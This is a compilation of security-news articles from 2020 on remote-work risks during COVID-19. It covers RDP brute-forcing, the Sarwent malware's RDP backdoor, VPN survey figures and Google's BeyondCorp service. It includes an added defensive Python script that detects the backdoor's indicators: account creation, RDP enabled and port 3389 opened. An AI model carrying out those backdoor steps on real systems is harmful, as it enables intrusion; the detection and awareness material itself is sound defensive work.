According to telemetry, most of the blocked IPs in January–May 2020 were seen in the United States, China, Russia, Germany and France. Countries that had the largest proportion of targeted IPs were Russia, Germany, Japan, Brazil and Hungary.

RDP has become a popular attack vector

RDP has become a popular attack vector in the past few years, especially among ransomware gangs. These cybercriminals often brute-force their way into a poorly secured network, elevate their rights to admin level, disable or uninstall security solutions, and then run ransomware to encrypt crucial company data.

However, other malicious actors try to exploit poorly secured RDP to install coin-mining malware or create backdoors, which can be used in case their unauthorized RDP access has been identified and closed.

Remote work in the time of COVID-19

The COVID-19 pandemic has, in one broad swipe, rewritten the rules regarding our workforce and jobs, with an almost instantaneous transition to remote work for those who were able to. While certain jobs require physical presence, a number of jobs fortunately can be done while working offsite.


For those companies that went into remote work mode back in March, there was little time to prepare and organizations that did not have remote work plans or policies already in place had to scramble to figure things out. Invariably, additional security challenges arose and had to be overcome.

Due to the rapidity of the transition, companies were caught off guard in a number of ways. Not having enough VPN or remote desktop licenses, dealing with higher than expected network traffic because of Zoom video meetings, and trying to provide secure access to internal applications, databases, and other tools that were not designed to be used from outside the corporate network – these are just the tip of the iceberg.

Those who work with sensitive information such as health information, financial data, intellectual property, source code, contracts, agreements, and other documents that require safe handling need a secure messaging platform. And IT security can be challenging for workers who are outside corporate firewalls and using personal computers and devices.

Remaining safe while working remotely

With employees being remote, companies not only have less control over the technology being used by employees, but home environments are much more vulnerable and leave employees susceptible to phishing attacks. This is where VPNs come in handy. VPNs can extend corporate security to protect people outside normal office environments—think of it as a firewall that magically extends to wherever that outside person sits.

But VPNs are not silver bullets. Secure messaging is also a key component as information is now flowing to a node outside the corporate network. Further, any information stored on a device outside the company ideally should be secured with encryption or other means.

While using VPNs is always a solid option, with the growth of cloud services, people can perform many job functions without the use of a VPN. Logging into Salesforce or Microsoft Office 365 can be done through any browser and may be preferred because of the convenience. However, if this is performed on a personal computer that is outside the IT team’s purview or control, the company may be unable to ensure proper security measures are in place.

Employee training as a key component to company protection

Defending against attacks can be enhanced by layering protection—like an onion. Physical defense like VPNs, firewalls, and encryption all help protect information at rest and in transit. But knowledge, education, and training are key components of a holistic security plan. This intangible piece may be the most important of all.

Many attacks target the weakest points of an organization – often its people – and no matter how thick your walls are or how heavy the gate is, if someone opens the door for an attacker, attackers can breach the soft, inner core of your company.

While an attack can happen at any time and in any location, cybersecurity concerns are dramatically higher when working remotely because of the IT department’s limited visibility and control over the environment. Workers always have questions about understanding potential threats and how to handle them, but outside the protection of corporate walls those threats can be even greater, so additional training or a refresher may be in order. For example, knowing how to identify and foil social engineering attacks, particularly through phishing attempts, is always a good training topic. Watching out for malware is another, as that can compromise a device by installing a keylogger, ransomware, or spyware.

Review budgets and make sure cybersecurity is taken into account

Even as the country starts to re-open to business, and people start to slowly return to offices, the COVID-19 crisis has been a wake-up call to companies to better understand their capabilities to support remote workers. With the possibility of a resurgence in the fall, now is the time to review and make infrastructure investments and upgrades, find more secure ways to share information, and update policies and procedures to cover the shift in work environments and habits.

What many have realized over the last several months is the degree of interconnectedness among businesses that drive the economy, and the need for services and solutions to work in a remote setting while in the midst of a major health threat. Supporting remote workers is a non-trivial problem for many organizations, but one that needs to be addressed. We have been thrust into a new world and way of doing things that has upended many of our expectations and understandings, and it’s important to be flexible, open to ideas, and continue to focus on driving productivity while protecting your employees.

41% of organizations have not taken any steps to expand secure access for the remote workforce

Currently, organizations are struggling to adjust to the new normal amidst the COVID-19 pandemic, a Bitglass survey reveals. 41% have not taken any steps to expand secure access for the remote workforce, and 50% are citing proper equipment as the biggest impediment to doing so. Consequently, 65% of organizations now enable personal devices to access managed applications.

Remote work and secure access concerns

When asked what their organizations are primarily concerned with securing while employees …


Creating an emergency ready cybersecurity program

A large part of the world’s workforce has transitioned to working remotely, but as plans are being drawn up to reopen economies, the security industry is being challenged to develop stronger screening practices, emergency operations planning, and to deploy tools to detect and minimize the impact that future pandemics, natural disasters and cyberattacks can have on a company.


Things like global security operation centers (SOCs), managed security services, thermal imaging and temperature screening for on-site visitors and employees and enhanced employee tracking capabilities are new areas of increased focus.

As security professionals are forced to reassess how the systems they monitor are working in this new environment, companies and organizations must still deal with day-to-day operations that are now more likely to occur on unsecured wireless networks. From data loss prevention and email spam protection to denial of service and data breach or leakage, there’s a large number of challenges to address as more and more workers work from home. So, what should businesses focus on to ensure security and safety?

The greatest vulnerabilities

One major cybersecurity shortcoming of companies is just how much of their network is accessible, both within an office and externally. As technology has advanced, the need for a secure network infrastructure is of the utmost importance to protect all company assets. That need is even more acute now, with many workers currently working from home on personal devices and unsecure wireless networks.

With the likely shift towards a more remote workforce in the coming years, across industries, wireless networks will need to be designed and revamped with security in mind.

Beyond the COVID-19 impact, IT teams still face non-standard deployments of technology in regard to security devices, as well as “bring your own device” options that are currently being used in every aspect of the IT world. IT groups also currently deal with a great deal of infrastructure that is aging without a replacement and/or a life-cycle management plan.

Additionally, “flat networks”, which were originally designed just to make sure everything could communicate, are still common. These networks were designed with very little regard for the security of edge devices and all other endpoints. Many enterprise customers are now retrofitting these networks to meet current cybersecurity requirements and recommendations. It is clear that security issues extend beyond our current, unforeseen circumstances and must still be dealt with promptly.

A strong incident response program

The success of security policies and systems depends on their proper implementation and a continuous improvement process to sustain the security program on a day-to-day basis. The program must meet business needs and appropriately mitigate security risks. By implementing an effective incident response program, a company will be able to use information generated from things like access control and video systems and ensure that its security events are “real” and not false positives due to technological problems. Any strong IR program should be quick and accurate, even with workers spread out around the globe.

Technology plays a growing role in almost all security programs but cannot be the ultimate factor when it comes to deciding which incidents require a response. As information becomes more integrated and easier to reach, successful IR programs ensure that the information delivered is accurate, relevant and actionable to security personnel. Technology may be providing the information avalanche, but it can also be used to effectively cull through the information and make sure the human operators only see what they are supposed to see.

The automation of security

How much of the world’s security can really be automated? Many simple tasks with access control and video systems are becoming more and more automated by the day. For example, video analytics are becoming more common on even the most basic security cameras and are less dependent on high-end servers than in the past.

Today, identification of people and vehicles can be accomplished through automation, rather than through human interaction. With remote workers, this is crucial. Many companies are now facing unexpected financial pressures and security budgets are being tightened. As such, automated processes for sending alerts and warnings have also taken on a larger role.

It is now expected, at the enterprise level, that every system should be able to auto-generate reports. Future deployment of all security-related technologies will further shrink the possibility of human error and the risk associated with those events, while providing a greater view for all stakeholders.

It goes without saying that we are in uncharted territory. As security experts work to shift security systems to accommodate the new reality we are living in, companies must find new ways to ensure the safety of their employees and their work – not just from COVID-19, but from additional challenges that come along with it.

As businesses across the world start to reopen, executives should be thinking about their cybersecurity protocols, and the best ways to utilize technology to their advantage. The most successful businesses will have strong, uniform IT standards and will be able to conduct their security work from any location, with a quick response.

Malware opens RDP backdoor into Windows systems

A new version of the Sarwent malware can open the Remote Desktop Protocol (RDP) port on target Windows computers to make sure that crooks can find their way back into the system through the backdoor.


Whether that access is used later by the same crooks or sold to ransomware gangs or cyber espionage groups is unknown, but affected users should know that removing the malware does not close that particular “backdoor”.

Sarwent’s new capabilities

Sarwent is a piece of malware that started out as a loader for other malware, but has recently been updated with two new functionalities, SentinelOne researchers discovered.

These newer variants can now also:

  • Execute commands via Windows Command Prompt and PowerShell
  • Create a new Windows user account, enable the RDP service for it, and make changes to the Windows firewall so that RDP access to the infected machine is allowed

Removing the malware from the infected computer will not automatically close the RDP “hole”. Users, admins or paid “cleaners” also have to remove the user account set up by the malware and close the RDP access port in the firewall.
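The sequence described above (new local account, RDP enabled, firewall opened) can be hunted for in host telemetry, and each hit maps directly onto the cleanup steps the article lists. This is an added example, not SentinelOne's detection logic: the normalised event records, their field names, the host and account names and the 10-minute window are all constructed assumptions.

```python
"""Correlate account creation with RDP exposure changes on the same host."""
from datetime import datetime, timedelta

RDP_PORT = 3389
WINDOW = timedelta(minutes=10)  # assumed correlation window

# Constructed, normalised host events (hypothetical field names and values),
# as a log pipeline might emit them from account-management, registry and
# firewall auditing.
EVENTS = [
    {"time": "2020-05-20T10:00:05", "host": "WS-014", "kind": "user_created",
     "account": "svc_helper"},
    {"time": "2020-05-20T10:00:09", "host": "WS-014", "kind": "registry_set",
     "value": "fDenyTSConnections", "data": 0},
    {"time": "2020-05-20T10:00:12", "host": "WS-014", "kind": "firewall_rule_added",
     "rule": "Allow RDP in", "port": 3389},
    # Benign: a new account with no RDP-related change around it.
    {"time": "2020-05-20T11:30:00", "host": "WS-022", "kind": "user_created",
     "account": "new.hire"},
    # Benign: a firewall rule for another port.
    {"time": "2020-05-20T14:00:00", "host": "SRV-003", "kind": "firewall_rule_added",
     "rule": "Web", "port": 443},
    # Not correlated: the RDP rule appears three hours after the account.
    {"time": "2020-05-20T09:00:00", "host": "WS-031", "kind": "user_created",
     "account": "tmp"},
    {"time": "2020-05-20T12:00:00", "host": "WS-031", "kind": "firewall_rule_added",
     "rule": "RDP", "port": 3389},
]


def _when(event):
    return datetime.fromisoformat(event["time"])


def is_rdp_exposure(event):
    """True for a change that opens RDP: service enabled or port allowed."""
    if event["kind"] == "registry_set":
        # fDenyTSConnections = 0 under the Terminal Server key enables RDP.
        return event.get("value") == "fDenyTSConnections" and event.get("data") == 0
    if event["kind"] == "firewall_rule_added":
        return event.get("port") == RDP_PORT
    return False


def find_rdp_backdoors(events, window=WINDOW):
    """Return one finding per new account that coincides with RDP exposure."""
    findings = []
    created_events = sorted((e for e in events if e["kind"] == "user_created"),
                            key=_when)
    for created in created_events:
        related = [
            e for e in events
            if e["host"] == created["host"]
            and is_rdp_exposure(e)
            and abs(_when(e) - _when(created)) <= window
        ]
        if not related:
            continue
        findings.append({
            "host": created["host"],
            "account": created["account"],
            "rdp_enabled": any(e["kind"] == "registry_set" for e in related),
            "firewall_rules": [e["rule"] for e in related
                               if e["kind"] == "firewall_rule_added"],
        })
    return findings


def cleanup_steps(finding):
    """Translate a finding into the follow-up work left after malware removal."""
    host = finding["host"]
    steps = [f"remove local account '{finding['account']}' on {host}"]
    for rule in finding["firewall_rules"]:
        steps.append(f"delete firewall rule '{rule}' on {host}")
    if finding["rdp_enabled"]:
        steps.append(f"disable RDP on {host} if it is not required")
    return steps


if __name__ == "__main__":
    for finding in find_rdp_backdoors(EVENTS):
        print(finding["host"], finding["account"])
        for step in cleanup_steps(finding):
            print("  -", step)
```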

RDP access: A hot commodity

Gaining access to Windows machines via the Remote Desktop Protocol has become a preferred tactic of cyber crooks and ransomware gangs, though they usually scan for machines/servers that already have RDP enabled and then they try to brute-force the passwords that safeguard access through it.

Since COVID-19 spread across the globe and many employees started working from home, RDP use has soared.

The crooks wielding Sarwent want to increase the chances of retaining access to the machine after the malware is found and removed.

It might be that they want to use that access themselves, to reinfect the computer at a later date. It’s also possible that they plan to rent or sell that access to other cyber gangs or individuals.

Access to corporate networks and systems is regularly sold on dark web forums and marketplaces.

Is remote work here to stay?

There’s no doubt COVID-19 set the remote work revolution on a fast track. And on that fast track, VPN usage soared to new heights with no signs of it slowing down. Companies had no choice but to close up shop and send their workers home, and just as quickly had to figure out how to secure that workforce.


But just how big is the spike? In a study conducted by OpenVPN, 30% of employees polled say their company recently implemented remote work capabilities for the first time. 61% already had remote work rules in place.

The accelerated need for virtualization also meant a massive uptick in VPN usage — but not just any VPNs. Business VPNs are booming, according to the study.

“VPNs are critical to our remote mindset and provide us with flexibility of being remote.” – a survey participant.

68% of employees say their company expanded VPN usage as a direct result of COVID-19, and 29% say their organization started using a VPN for the first time.

But remote work is not completely new — in fact, it’s been on the rise for some time. Consider these stats:

From 2005 – 2017 there was a 159% jump in remote work. In 2015: 3.9 million U.S. workers were already remote. Today? Over 5 million. And there’s no sign of the surge slowing down now, or ever — especially in the current climate.

The study surveyed workers from 300 different companies across sectors such as technology, energy, education, healthcare, engineering, and construction, and explored how companies are handling the new remote era, during the pandemic.

The study explored how organizations are handling the new COVID-19 remote era — and how they are securing their teams. The study seeks to answer the question: “Is remote work really the future?” If the numbers are any indication, the answer is a resounding YES.

Business VPNs are essential

Businesses are recognizing a layered approach is always the best approach for combating cyberattacks — and a necessary component of this approach is to invest in a reputable business VPN.

Even if every cell phone and laptop comes equipped with a personal VPN in the future, businesses will still need a secure way for workers to access a private network, and they will need an enterprise VPN to do so.

A personal VPN provides you with secure, private access to the internet, which is valuable in its own right — but a business VPN gives you the ability to remotely access private network resources, often essential for completing work, and to securely connect your company’s branches and locations worldwide.

Nearly 70% of employees polled say their companies expanded business VPN usage, and 29% say their organization started using it for the first time. That’s a big boom, mostly due to COVID-19… but is it here to stay?

Surprisingly, not all companies are on board.

Of the 21% of polled employees whose companies have never used a VPN, 71% went on to say their companies are still neglecting to utilize this essential security tool, despite switching to remote work. This suggests many companies still do not have a network security plan in place for remote work, despite the current crisis.

The good news is the companies that have started with secure remote access are almost unanimously in favor of maintaining that protocol: 99% of surveyed employees whose companies use a VPN believe those companies will continue usage after the emergency phase of COVID-19 is over. This encouraging percentage suggests that business VPNs will continue to be an essential part of secure remote access for years to come.

“We have always used VPN for remote work, with 2FA. It would be absolute lunacy to not do so, and there is not a chance on earth that we would discontinue use of our VPN.” – a survey participant.

Is the pandemic pushing organizations to finally go remote?

Employers that have the ability, but have still chosen not to offer their employees remote work capabilities during this time, are falling behind. Those polled describe their employers as uncaring and reckless — willing to risk their health and safety rather than make necessary adjustments.

“My company informed us remote work would be implemented soon. But that doesn’t make up for the fact that so many were furloughed due to lack of preparedness.” – a survey participant.

This illustrates an important point: companies must be prepared, or people will suffer.

Organizations that take the time to establish a secure remote strategy will be far ahead of competitors who choose not to. Offering flexibility can have an enormous impact on companies and the future of their business.

Remote employee: “I have worked from home for five years. Working remotely has given my company and me an edge over other companies that had to suddenly pivot and learn to work remotely. While they still struggle to learn, we have become the leaders and teachers for those who have never done this.”

Office-bound employee: “I think when the economy stabilizes a bit, I may consider finding a different job with a company that provides a safer work environment.”


People have mixed feelings about remote work during this stressful era

According to the study, only 5% of employees claim their company willfully chooses to prevent remote work, despite having the capability to provide it. Of that 5% still working at the office, 53% were worried about increased exposure, 29% claimed more stress and anxiety, and 18% had difficulty procuring childcare, suggesting that working in the office during a pandemic can have immediate and serious consequences for employees’ well-being.

Increased stress and anxiety have been found to have a direct effect on performance at work, which means those few employees still forced to go into the office are likely unable to perform at the level their employers would hope for.

In contrast, 30% of employees report that their company recently implemented remote work capabilities for the first time, while 61% already had remote work capabilities in place.

Of those 91% currently working from home, many report positive impacts on their work: 65% enjoy the flexibility, 40% claim fewer distractions, 36% say working from home lowers their stress and anxiety, and 33% have noticed an increase in their productivity.

Companies that have made this change have happier, less stressed employees — and, of course, the ability to continue operating during these unprecedented times.

Remote work should include secure access

“VPNs/remote access is key to allowing people to work when they can. This is the cornerstone of our business continuity plan.” – a survey participant.

Remote work and business VPNs go hand-in-hand; for your team to have secure access to the resources they need, a business VPN is critical to creating an infrastructure safe from breaches.

Will remote work become the norm? Only time will tell, but COVID-19 has certainly revealed that remote work capabilities often make or break a company’s success. Those without the ability to pivot often fall behind, and quickly.

Google unveils secure remote access service to unburden enterprise VPNs

Google has made available BeyondCorp Remote Access, a cloud-based, zero trust service that allows employees, contractors and partners to securely access specific corporate resources from untrusted networks without having to use the company’s VPN.


The goal is to keep companies with a suddenly massive remote workforce from overburdening their VPN infrastructure.

About BeyondCorp Remote Access

BeyondCorp Remote Access is a subscription-based service that is available through Google Cloud.

“This cloud solution — based on the zero trust approach we’ve used internally for almost a decade — lets your employees and extended workforce access internal web apps from virtually any device, anywhere, without a traditional remote-access VPN,” Google Cloud honchos Sunil Potti and Sampath Srinivas explained.

“Over time, we plan to offer the same capability, control, and additional protections for virtually any application or resource a user needs to access.”

Access to web apps and services is granted (or not) based on user identity, device identity, device security, location, and other metadata and signals collected through the browser or an endpoint agent that is installed on the user’s device (if the customer mandates it).

The web apps that can be accessed through the service can be hosted on Google Cloud, on other clouds, or on the customer’s premises. Enterprise admins can configure access policies for each app.


“For example, you can enforce a policy that says: ‘My contract HR recruiters working from home on their own laptops can access our web-based document management system (and nothing else), but only if they are using the latest version of the OS, and are using phishing-resistant authentication like security keys.’ Or: ‘My timecard application should be safely available to all hourly employees on any device, anywhere,’” the duo explained.
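The two policies quoted above can be modelled as a default-deny decision over identity, device and authentication signals. The sketch below is an added illustration, not Google's policy language or API; the group names, app names and signal fields are all assumptions made for the example.

```python
from dataclasses import dataclass

# Constructed vocabulary for illustration only; not BeyondCorp identifiers.
PHISHING_RESISTANT = {"security_key"}

@dataclass(frozen=True)
class Request:
    groups: frozenset   # identity: groups asserted by the identity provider
    app: str            # the web app being requested
    os_is_latest: bool  # device security signal from the browser or endpoint agent
    auth_method: str    # e.g. "security_key", "otp", "password"

@dataclass(frozen=True)
class Rule:
    app: str
    group: str
    require_latest_os: bool = False
    require_phishing_resistant: bool = False

# The two example policies from the quote, one rule each.
RULES = [
    Rule("document-management", "contract-hr-recruiters",
         require_latest_os=True, require_phishing_resistant=True),
    Rule("timecard", "hourly-employees"),  # any device, anywhere
]

def decide(req):
    """Return (allowed, reason). Anything not explicitly granted is denied."""
    failures = []
    for rule in RULES:
        if rule.app != req.app or rule.group not in req.groups:
            continue  # rule does not apply to this user/app pair
        if rule.require_latest_os and not req.os_is_latest:
            failures.append("device OS is not the latest version")
            continue
        if (rule.require_phishing_resistant
                and req.auth_method not in PHISHING_RESISTANT):
            failures.append("authentication is not phishing-resistant")
            continue
        return True, "allowed by rule for " + rule.group
    return False, "; ".join(failures) or "no rule grants this group access to this app"

if __name__ == "__main__":
    recruiter = frozenset({"contract-hr-recruiters"})
    for req in (
        Request(recruiter, "document-management", True, "security_key"),
        Request(recruiter, "document-management", True, "otp"),
        Request(recruiter, "timecard", True, "security_key"),
    ):
        print(req.app, req.auth_method, decide(req))
```

The third request shows the "and nothing else" clause: a fully compliant recruiter is still refused the timecard app because no rule grants it.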

The company’s long term plan is to “offer the same capability, control, and additional protections for virtually any application or resource a user needs to access.”

Cybersecurity in a remote workplace: A joint effort

The reaction to the COVID-19 pandemic has disrupted every aspect of life across the globe and many companies now find themselves with fully remote workforces.

With so many employees now working from home, business networks have been opened to countless untrusted networks and – potentially – some unsanctioned devices. Naturally, the question of security arises given the need to ensure that employees are well prepared for the challenges associated with remote work. It also means that businesses must be certain that their security infrastructure is well geared to secure personal and corporate data.

So, in the context of a remote workplace, how can organizations improve their cybersecurity and prevent workers falling prey to hackers?

The hacker’s way in

The remote workplace provides hackers with an increased number of possible attack routes, all of which organizations need to have on their radar. Chief among these concerns is the matter of authentication and authorization.

Last year was the worst on record for the number of data breaches resulting in exposed records and login credentials, and this trend shows no signs of stopping.

Meanwhile, attempted phishing attacks have been an equally common occurrence among workers, who are now receiving more emails than ever before. We’ve seen a sharp spike in phishing attacks and malicious fake domains as hackers attempt to capitalize on the situation, slipping in among legitimate correspondence and imitating colleagues to harvest credentials.

These two security concerns alone highlight the importance of workers staying vigilant and maintaining security awareness in their everyday work. By this we mean ensuring that passwords are randomly generated and unique across different accounts and that they’re using multi-factor authentication wherever possible. Doing so will help prevent attackers from tapping into computers, mobile devices and home wireless networks where they can access sensitive information.

Keeping cybercriminals at bay

When it comes to heightened security risks, businesses must always be thinking about the financial and reputational implications of any sensitive information being exposed. But how can they stay ahead of the hackers?

It falls on businesses to ensure that their security infrastructure is up to the challenge. This means having adequate access to critical resources through SaaS-provided services, remote support for field workers, and a security architecture that functions in hybrid operations environments. For companies that have not transitioned to a remote-enabled, open network security architecture for at least some staff, this will likely be a fairly significant challenge.

But beyond this, it involves a culture of security awareness ingrained throughout the company. Changes to the security infrastructure must be communicated to staff openly and transparently, and IT, security, HR and operations must coordinate to ensure there are no gaps in security.

In addition to this, the onus falls on employees to ensure that their security hygiene is up to scratch. The human element is often the weakest link in the security chain, with workers failing to take basic steps to protect themselves against cybercriminals. Employees must adhere to and understand their employer’s security goals and guidelines, engaging in security training and awareness programs to drive cybersmart behavior at home. Doing so will go a long way in helping to keep an organization secure, fending off viruses and other malware.

Tools at your disposal

There are a large number of tools available to help organizations along the way. For example, password managers are an easy solution which can be quickly and seamlessly integrated into existing workflows. Additionally, they often also include multi-factor authentication features that provide additional security measures when people are logging in from different locations than normal.

Implementing these solutions kills two birds with one stone, by also enabling users to generate and store unique passwords for every login. The username and passwords are then stored within a secure vault, where they’re organized and encrypted for safekeeping and ease of access. By using solutions like password managers and turning on multi-factor authentication where available, users can improve their password hygiene, limiting the risk of being hacked.

Remote work done the right way

Ultimately, creating a stronger online security posture takes time and lots of education, but under the current circumstances, we all need to play our part. Businesses must be sure that their security infrastructure can handle the challenges of a remote workforce. But equally, every worker must understand that poor password hygiene, whether it’s failing to change a default password, reusing passwords or using weak credentials, greatly increases the chances of being hacked.

What’s more, they must use security training and awareness programs to drive “cyber smart” behavior not only at work but also at home. Keeping your organization secure should be a priority in any circumstance, but it becomes even more relevant as remote working becomes the norm. When keeping employees and your organization secure, considering the necessary measures to account for this new way of working will go a long way.